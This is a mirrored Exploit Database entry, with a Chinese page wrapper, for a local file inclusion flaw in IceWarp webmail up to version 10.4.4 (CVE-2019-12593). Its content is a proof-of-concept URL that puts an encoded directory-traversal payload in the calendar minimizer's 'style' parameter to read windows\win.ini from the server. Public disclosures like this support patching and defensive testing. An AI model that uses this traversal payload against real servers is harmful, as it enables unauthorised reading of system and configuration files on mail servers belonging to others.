IceWarp 10.4.4 – Local File Inclusion

• Exploit Database
• 41 阅读

• 作者： JameelNabbo
  日期： 2019-06-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46959/

• # Exploit Title: IceWarp <=10.4.4 local file include
  # Date: 02/06/2019
  # Exploit Author: JameelNabbo
  # Website: uitsec.com
  # Vendor Homepage: http://www.icewarp.com
  # Software Link: https://www.icewarp.com/downloads/trial/
  # Version: 10.4.4
  # Tested on: Windows 10
  # CVE: CVE-2019-12593
  POC:
  
  http://example.com/webmail/calendar/minimizer/index.php?style=[LFI]
  
  Example:
  http://example.com/webmail/calendar/minimizer/index.php?style=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini